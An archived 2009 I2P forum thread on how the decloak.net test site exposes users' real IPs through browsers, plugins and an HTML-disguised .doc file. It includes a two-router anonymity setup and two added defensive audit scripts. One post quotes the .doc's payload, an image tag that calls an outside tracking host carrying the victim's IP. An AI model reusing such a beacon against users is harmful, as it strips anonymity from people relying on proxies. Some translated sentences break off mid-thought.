This is the eepSites cache  for 'h' from http://forum.i2p/viewtopic.php?t=3622 on 7/16/2009. The page may have changed since that time.

catching your IP using your browser
Guest
Posted: Sat Jun 13, 2009 1:17 pm

I found a website using several techniques to find your IP using your browser, even using the I2P outproxy:

!!!!!! THIS MIGHT REVEAL YOUR IP: http://decloak.net/

With a proper setup, and if you do not download stuff from the internet (this website uses a .doc), you still can be anonymous. I use Firefox, privoxy, the noscript addon for firefox and broke the FTP setup in firefox. Of course there are probably other techniques than those found in this website, but it is fun to try.

Guest
Posted: Sat Jun 13, 2009 6:31 pm

*beep*, can't the download be anonymized as well?
Only if I accept the download they find out my ip-#
Having seamonkey with no-script

Guest
Posted: Sat Jun 13, 2009 7:39 pm

The issue with the .doc is not the download:
From the website,
"When Microsoft Office is installed and configured to automatically open documents, a file can be returned which automatically downloads an image from the internet. This can bypass proxy settings and expose the real DNS servers of the user."

In my own test, that works as well with openoffice.org

HolyCrap
Posted: Sat Jun 13, 2009 10:56 pm
Joined: 09 Jun 2009
Posts: 15

Well it seems an i2pfox setup passes. It didn't show any information about myself. No, I didn't open the doc. I'd be reluctant to open a doc file to begin with, even more reluctant if it tries to be downloaded automatically. I don't use Microsoft Office anyway.


tino
Posted: Sun Jun 14, 2009 4:23 am
I2Pothead
Joined: 13 Apr 2005
Posts: 121
Location: de

Complete example of a secure setup which survives such an attack, see below.


Anonymous wrote:
I found a website using several techniques to find your IP using your browser, even using the I2P outproxy:

This is true and false at the same time.

- First, it only works for Windows. However this type of exploit can be done with Linux as well.

- Second, it only works if you have Microsoft Office installed. However there are enough fancy bugs in software out there that there are zillions of other options to do it.

- Third, it needs a machine which is connected transparently to the Internet. In good Intranets the firewall will catch that issue, such that you can only do requests over the Proxy. So all this test will reveal still is the IP of the proxy, not your IP. However 99% of the home users will be transparently connected to the Internet, so this type of exploit works.

It's an exploit. And it's not even a good one. All you need to have the same issues on your browser is to have the flash plugin installed, as flash - for some reason or bug - often ignores your proxy settings.

So what do we learn from this?

Nothing new.

- If you want to stay anonymous, put the machine you work with behind a good firewall. Such a good firewall is not expensive. For example, 2m of air, unconnected, is a good enough firewall.

- If you decide to have some Internet connection, make sure the machine cannot reach the Internet directly. If you want to try that at home that's quite easy. See below.

- Do not use the same machine for anonymous and non-anonymous things. So if you need to surf the normal way and want to use anonymous stuff in parallel, use two computers.

So how to have a home-brewed setting which is somewhat more bulletproof?

It's quite easy and not very expensive. The IP numbers are just an example.

- Instead of using one router, use two.

- The first router, internal IP 192.168.4.253, is connected to your dialup/cable/DSL and works as usual. It provides public (non-anonymous) service. For example, this can be your cable modem if you are able to disable DHCP on it (else you need to connect it to a dedicated router to fix that).

- This first router can be an Internet-PC as well. This PC needs a separate internal network card (usually a second ethernet card) then.

- Do not activate DHCP on this first router! For Windows, do not activate Internet Connection Sharing on the internal Ethernet interface.

- If the first router is able to do more services (like proxy etc.), you are welcome to activate them. Abstain from doing things which are in the anonymous area, like file sharing for the internal network.

- The second router, 192.168.4.254, is connected nowhere. It's mainly needed for providing DHCP to your internal network. If you have a wLAN access point, this can be your second router (but keep in mind, wLAN is not a private network, not even if encrypted, as wLAN is inherently insecure).

- If the second router is capable of doing more service, like providing a file share, you are welcome to activate these services there. Do not activate a proxy on it which would be able to retrieve Internet pages directly. If you can run Privoxy on it (or similar), do it.

- Do *not* set the default route of the second router to the first router!

- DHCP on the second router can hand out IPs in the range 192.168.4.100 to 192.168.4.200 for example.

- If your routers are dumb gadgets, there is no Proxy on your routers. You need at least two proxy services on your network:

- First public proxy uses the first router to connect to the Internet. If the first router is a PC, you can try Privoxy or similar software, which is capable of listening on the internal network IP 192.168.4.253

- Second an anonymous proxy. This can be your I2P node or a Privoxy, which is able to connect to TOR.

- Note that both proxies can run on the same machine. However you should consider not doing so, as else you (or your software) might get confused and accidentally use the wrong proxy setting. So keep separated things separated.

- You can run I2P on your public PC (where you publicly surf the Web, read your mail, etc.), however this is bad, as your public PC might get trojaned or whatever. So consider setting up a dedicated machine for I2P. For example, you can lease a vserver on the Internet to install I2P there, this does not cost much (10$/Month or so). To this machine you can do an SSH tunnel (which is beyond the scope of this post) to forward the I2P proxy port to your local machine.

Now, if you take your laptop, it pulls the IP from the second router via DHCP. Also it learns the default route to the second router. As the second router does not forward the packets to the first router, there simply is no direct Internet connection. So by default (this is important!) the machine stays anonymous.

Also the second router is incapable of resolving DNS. So there will be no DNS leakage for computers which try to phone home. (If the default is to be non-anonymous, some software might just default, and therefore succeed, in doing an Internet connect.)

If you want to read the WWW, you simply give the public proxy on the laptop. If this proxy runs on your first router, this probably is 192.168.4.253:8080. If you are able to password protect your public proxy, do it. This is to make software unable to accidentally use this public proxy.

If you want to stay anonymous, give your machine the anonymous proxy. This is your eepproxy on your I2P machine (perhaps 192.168.4.254:4444 if I2P runs on your second router, but this usually is not the case).

Note that you cannot run I2P on your laptop directly. This is because I2P needs an Internet connection.

Also note that it is difficult to run I2P behind your first router, as I2P works best with a direct Internet connection. However you can configure I2P to announce some port and forward that port from your first router to your I2P node. If your first router is an Internet PC, you can run I2P there, too, but keep in mind that it's confusing to run public and anonymous services on the same machine. In the latter case your I2P proxy is 192.168.4.253:4444 and you definitely give your public proxy a password!

So here is a complete example:

- A cable modem.

- A windows based Internet PC running I2P node, too.

- A wLAN AP.

- A wLAN Laptop used to surf anonymously.

Note that you often have that at home, already.

- Leave the cable modem as is.

- Directly connect your Internet PC to the cable modem. Leave the Interface on DHCP setting (or whatever your ISP recommends).

- Do not activate Internet Connection Sharing on your Internet PC.

- Connect the wLAN AP to a secondary Ethernet card of your Internet PC. Give this Interface the fixed IP 192.168.4.253 (Netmask 255.255.255.0)

- Configure your wLAN AP to 192.168.4.254. Do not set a default route.

- Do DHCP on the wLAN AP for, say, 192.168.4.100 to 200

- Connect your Laptop to the wLAN

- Run I2P on your Internet PC, port 4444.

- Run Privoxy on your Internet PC, port 8080.

- If you like you can run TOR on your Internet PC.

- If you like you can run Freenet on your Internet PC.

- Your public proxy then is 192.168.4.253:8080

- Your anonymous proxy then is 192.168.4.253:4444

That's it. Even if you open some nasty software on your Laptop which tries hard to phone home, this will not work, as, without ICS active, your Internet PC is incapable of routing packets which reach it on the internal network via the wLAN AP.

So the software must go over the public proxy port. If it's password protected (I dunno if Privoxy supports that, but there is software out there which does) the software cannot guess that, and therefore will fail.

Easy enough, right?

It has downsides!

Some games and flash games do not work over such a setup without help. They will work on your Internet PC, but not on a PC connected to the wLAN. As your Internet PC does no packet forwarding (NAT), games cannot connect to their server from the internal network.

If this is an issue you need another router between your Internet-PC and the cable modem. This router must be able to do UPnP to allow I2P to open all ports (does I2P support that today?), else you are doomed to configure everything yourself. The zone between this router and your Internet-PC can be considered a DMZ in network phrases. Everything which needs a transparent connection to the Internet (like games) needs to live in the DMZ.

Note that a proper wLAN AP could do all three things for you. However setting this up correctly is difficult, and I do not know of any stock firmware which allows such a setup (often there is a proper Linux replacement Firmware which can do it). Also there is no standard router package out there which is properly working (IPcop is not suited to that task).

At my side, the "Public Internet PC" is just a Linux box. It has 3 network interfaces, one for cable, one for wLAN DMZ and one for private Intranet. It is doing NAT between wLAN and Cable, but only for some selected Internet IPs from my Intranet.

It is also doing DHCP for the Intranet, as when I did the setup over a decade ago, I did not have a secondary DHCP server back then (I did not have wLAN either, but there was a DMZ). However it does not route packets to destinations which are not allowed, so there is no flaw. But such a setup is somewhat more complicated than the one noted above.

My setup has worked for me for over 10 years now, and it is pretty stable. If I want to surf anonymously, I take a dedicated piece of software (like Konqueror) with a proxy setting to the anonymous network (Firefox with FoxyProxy pinned to the anonymous Proxy does it as well). My public proxy knows about .i2p and .onion, too, so I can quickly access such resources without hassle - but I know I do this non-anonymously then.
_________________
-Tino
About my fproxy see http://tino.i2p/freenet.html
About my inproxy see http://i2p.to/
Alternative Seed URL http://i2pdb.tin0.de/netDb/
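As an added check for the two-router setup described in the post above (example code written for this page, not code from the post or from the I2P project), the following script audits a laptop against the "anonymous by default" criteria the post relies on: no default route, no nameserver, and a proxy setting that points at the anonymous proxy rather than the public one. The `ip route` and `resolv.conf` samples are constructed, the proxy addresses reuse the post's example numbering (an assumption about the audited host), and reading the live tables via `ip -4 route show` assumes a Linux laptop.

```python
"""Audit a workstation against the 'anonymous by default' criteria from the
post above: no default route, no nameserver, and a browser proxy that points
at the anonymous proxy rather than the public one.  Added example, not code
from the forum post; the command outputs below are constructed samples."""
import re
import subprocess

# Addresses from the post's example setup (assumption: same numbering on the audited host).
PUBLIC_PROXY = "192.168.4.253:8080"   # Privoxy on the Internet PC, non-anonymous
ANON_PROXY = "192.168.4.253:4444"     # I2P eepproxy on the Internet PC

# Constructed sample of `ip -4 route show` on a laptop attached to the wLAN AP.
ROUTES_OK = "192.168.4.0/24 dev wlan0 proto kernel scope link src 192.168.4.123\n"
# Same laptop after a default route to the first router was added by hand.
ROUTES_LEAKY = ("default via 192.168.4.253 dev wlan0\n"
                "192.168.4.0/24 dev wlan0 proto kernel scope link src 192.168.4.123\n")
# Constructed /etc/resolv.conf contents for both cases.
RESOLV_OK = "# deliberately no nameserver: the wLAN AP does not resolve DNS\nsearch lan\n"
RESOLV_LEAKY = "nameserver 192.168.4.253\n"


def default_routes(ip_route_output):
    """Next-hop address of every default route in `ip route` output."""
    hops = []
    for line in ip_route_output.splitlines():
        m = re.match(r"default\s+via\s+(\S+)", line.strip())
        if m:
            hops.append(m.group(1))
    return hops


def nameservers(resolv_conf):
    """Nameserver addresses listed in resolv.conf text (comments ignored)."""
    found = []
    for line in resolv_conf.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) == 2 and fields[0] == "nameserver":
            found.append(fields[1])
    return found


def proxy_mode(env):
    """Classify the http_proxy setting: 'none', 'anonymous', 'public' or 'other'."""
    proxy = env.get("http_proxy") or env.get("HTTP_PROXY") or ""
    if not proxy:
        return "none"          # no proxy at all: nothing leaves the laptop, which is the safe default
    if ANON_PROXY in proxy:
        return "anonymous"
    if PUBLIC_PROXY in proxy:
        return "public"
    return "other"


def audit(ip_route_output, resolv_conf):
    """Findings that break the 'no direct Internet, no DNS' property; empty means it holds."""
    findings = []
    for hop in default_routes(ip_route_output):
        findings.append(f"default route via {hop}: phone-home software can reach the Internet directly")
    for ns in nameservers(resolv_conf):
        findings.append(f"nameserver {ns}: a DNS lookup alone can reveal your ISP or IP")
    return findings


if __name__ == "__main__":
    import os
    try:  # on a real Linux laptop read the live routing table and resolver config
        routes = subprocess.run(["ip", "-4", "route", "show"],
                                capture_output=True, text=True, check=True).stdout
        with open("/etc/resolv.conf") as fh:
            resolv = fh.read()
    except (OSError, subprocess.CalledProcessError):
        routes, resolv = ROUTES_LEAKY, RESOLV_LEAKY   # fall back to the constructed sample
    for finding in audit(routes, resolv) or ["OK: no default route and no nameserver"]:
        print(finding)
    print("proxy mode:", proxy_mode(os.environ))
```

Run it on the wLAN laptop; a clean result is an empty findings list plus proxy mode "anonymous" (or "none" when nothing should leave the machine at all). A "public" proxy mode is exactly the accidental misuse the post's password-protected public proxy is meant to catch.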


Gast
Posted: Sun Jun 14, 2009 11:10 am
Guest

tino wrote:
- First, it only works for windows. However this type of exploit can be done with Linux as well.
- Second, it only works if you have Microsoft Office installed.

No. An FTP download is triggered in the web browser. These are often not

Code:
% torify $my_ftp-downloader

The .doc contains nothing other than

Code:
<html>
<img src="http://ff8c6...word.$IP.19.0.0.0.0.spy.decloak.net/decloak_office.html?cid\
=ff8c6..."/>
</html>

If your KDE/Gnome X-$Desktop starts such applications automatically, this address gets requested as well! A corresponding proxy server must be configured in OpenOffice.
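A defender-side check for a "document" like the one quoted in the post above, added here as an example (not part of the post, and not a tool of the site under discussion): it sniffs the real container format from the leading bytes, and for an HTML payload lists the remote resources that would be fetched the moment an office suite or desktop auto-opens the file. The sample file is constructed after the quoted snippet, with a placeholder host name in place of the real one.

```python
"""Inspect a downloaded 'document' before an office suite opens it: identify the
real container format and list the remote resources an HTML payload would fetch.
Added example, not from the forum post; the sample file is constructed and its
host name is a placeholder, not the real tracking host."""
from html.parser import HTMLParser
from urllib.parse import urlparse

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy binary .doc container
ZIP_MAGIC = b"PK\x03\x04"                            # .docx / .odt (zip based)
RTF_MAGIC = b"{\\rtf"

# Constructed stand-in for the .doc quoted above: plain HTML with one external image.
SAMPLE_DOC = (b"<html>\n"
              b'<img src="http://tracking-id.word.spy.beacon.example/decloak_office.html?cid=tracking-id"/>\n'
              b"</html>\n")


def sniff_format(data):
    """Classify by leading bytes, ignoring the file extension entirely."""
    if data.startswith(OLE2_MAGIC):
        return "ole2"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    if data.startswith(RTF_MAGIC):
        return "rtf"
    if data.lstrip()[:1] == b"<":
        return "html"
    return "unknown"


class _RefCollector(HTMLParser):
    """Collects the URL attribute of tags that load a resource without user action."""
    WATCH = {"img": "src", "script": "src", "iframe": "src", "link": "href",
             "object": "data", "embed": "src", "source": "src"}

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser routes self-closing tags such as <img .../> through here as well.
        wanted = self.WATCH.get(tag)
        if wanted:
            for name, value in attrs:
                if name == wanted and value:
                    self.refs.append((tag, value))


def external_refs(data):
    """(tag, url, host) for every absolute http/https/ftp reference in an HTML payload."""
    collector = _RefCollector()
    collector.feed(data.decode("utf-8", "replace"))
    out = []
    for tag, url in collector.refs:
        parts = urlparse(url)
        if parts.scheme in ("http", "https", "ftp") and parts.hostname:
            out.append((tag, url, parts.hostname))
    return out


def assess(data):
    """Return (format, findings).  No findings means nothing would be fetched on open."""
    fmt = sniff_format(data)
    findings = []
    if fmt == "html":
        findings.append("file is HTML, not a Word container: the office suite will render it as a web page")
        for tag, url, host in external_refs(data):
            findings.append(f"<{tag}> loads {url}: opening the file resolves {host} and connects to it, "
                            f"outside the browser's proxy settings")
    return fmt, findings


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DOC
    fmt, findings = assess(blob)
    print("format:", fmt)
    for line in findings or ["no remote references found"]:
        print(" -", line)
```

The format sniff is the important half: the quoted payload is not a Word file at all, so any policy keyed on the `.doc` extension misses it, while a check on the leading bytes does not. The host list matters even when the fetch itself would fail, because the name lookup already leaves the machine.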

tino
Posted: Sun Jun 14, 2009 1:40 pm
I2Pothead
Joined: 13 Apr 2005
Posts: 121
Location: de

Since the post cited was in German, I answer it in German, too:


Gast wrote:
tino wrote:
- First, it only works for windows. However this type of exploit can be done with Linux as well.
- Second, it only works if you have Microsoft Office installed.

No. An FTP download is triggered in the web browser.

This exploit only works if the browser is misconfigured. In that respect you of course
I2P supports

That is why I had only focused on the attack via Office

Gast wrote:
The .doc contains nothing other than

Code:
<html>
<img src="http://ff8c6...word.$IP.19.0.0.0.0.spy.decloak.net/decloak_office.html?cid\
=ff8c6..."/>
</html>

If your KDE/Gnome X-$Desktop starts such applications automatically, this address gets requested as well! A corresponding proxy server must be configured in OpenOffice.

We hold two different positions here.

I am assuming an exploit that finds out the IP and is not relevant under criminal law. The FTP URL in the browser falls under that as well.

But if the exploit is applied to OO, then here a
So while the exploit is merely cheeky with Microsoft Office, it becomes illegal with OpenOffice.

You read that right: while the evaluation of URLs under Microsoft Office is a standard that cannot be imagined away, I rate the same circumstance in OO as a flaw that cannot be argued away. The reason is that MO is (in principle) Windows-only and thus has a different user base than OO. If OO fundamental -
With MO, on the other hand, this will never be a bug, because from that
Twisted Evil . o O (Saved again, phew) O o . Twisted Evil
_________________
-Tino
About my fproxy see http://tino.i2p/freenet.html
About my inproxy see http://i2p.to/
Alternative Seed URL http://i2pdb.tin0.de/netDb/


Guest
Posted: Mon Jun 15, 2009 12:08 am

tino, you're wrong: it does NOT only work with windows, it also works under Linux with OOo

tino
Posted: Mon Jun 15, 2009 1:52 pm
I2Pothead
Joined: 13 Apr 2005
Posts: 121
Location: de

Anonymous wrote:
tino, you're wrong: it does NOT only work with windows, it also works under Linux with OOo

Not quite, as there is a difference.

With Microsoft Office it uses a known and documented Feature of Microsoft Office.

With OO it uses a bug in OO, because the fact that OO is "compatible" to Microsoft Office in this respect must be considered a bug here. As the way Microsoft Office does it is the Windows way, this is not suitable to Unix. Porting Windows design flaws to Linux by copying how Microsoft did it, therefore *must* be considered a bug. Else the whole OO concept (being portable) is flawed.

So, yes, this particular exploit works with both Office suites. With a fundamental difference:

With Microsoft Office it is NOT AGAINST THE LAW to do it.

With OO it IS AGAINST THE LAW to exploit that feature, at least here in Germany using bugs to gain access to protected data is prohibited by law now.

As the website states, their exploit is not against the law. Therefor it only works with Microsoft Office Twisted Evil (Thank God for logic.)

It works with OO, too, but then it's another exploit, which abuses interfaces in an unlawful way.

Also note that the website mounts zillions of other attacks against your privacy, not only Microsoft Office. It also uses FTP-URLs, Flash, Apple QuickTime, and trainloads of other browser plugins to reveal your real IP. It does not even require that the plugin succeeds in retrieving the data! However most attacks do not abuse things, they use officially documented features - or lack of design. Strictly speaking, these are no bugs, as browser plugins are designed to work with URLs primarily - while this is not true for Office Suites. (So only the OO feature is flawed, while the MO feature is used in a correct way. Perhaps somebody will declare that the Plugins have a bug, but I cannot see any there, also I am not much interested in that case.)

Note that often the DNS query for the name in the URL is enough to reveal your real ISP, if not even your real IP (if your router does resolve DNS itself, which is quite common these days due to DNS censoring, like mounted against the people here in Germany or in Great Britain).

I am pretty sure that OO will fix that bug some time. I am also pretty sure that Microsoft does not see any need to change that feature ever, as this type of design is a wanted feature in Microsoft Office. Some companies even rely on that feature, so I doubt that Microsoft sees pressure to change this feature.
_________________
-Tino
About my fproxy see http://tino.i2p/freenet.html
About my inproxy see http://i2p.to/
Alternative Seed URL http://i2pdb.tin0.de/netDb/


Guest
Posted: Mon Jun 15, 2009 9:24 pm

if using it with OOo is against the law and they say they don't do anything against the law, then the conclusion is NOT that it does not work under OOo, but rather that they are lying - maybe unknowingly, given that it DOES work with OOo, and if you go to this site, with your linux box with OOo installed, and you dl and open that file, you'll see that without further security changes, it will work: They'll get your real IP.

Checked and proven.

tino
Posted: Tue Jun 16, 2009 12:53 am
I2Pothead
Joined: 13 Apr 2005
Posts: 121
Location: de

Didn't I write this with:

tino wrote:
However this type of exploit can be done with Linux as well.

tino wrote:
However there are enough fancy bugs in software out there that there are zillions of other options to do it.

Do I really need to mention OO in particular if there are zillions of other ways to have a .doc or anything else come out fatal?

The fact still holds:

This particular exploit only is possible, in a lawful manner (that's what they claim on their web page), with Windows and Microsoft Office installed.

On other platforms together with some other applications (this bug is certainly not only in OO) this exploit still *works*, but (most of the time) becomes unlawful there. I did not mention this precisely but it now, hopefully, is corrected.

Sorry for me, being human and unable to express things flawlessly. And this is my last post to this thread now, as it already is killing time.
_________________
-Tino
About my fproxy see http://tino.i2p/freenet.html
About my inproxy see http://i2p.to/
Alternative Seed URL http://i2pdb.tin0.de/netDb/

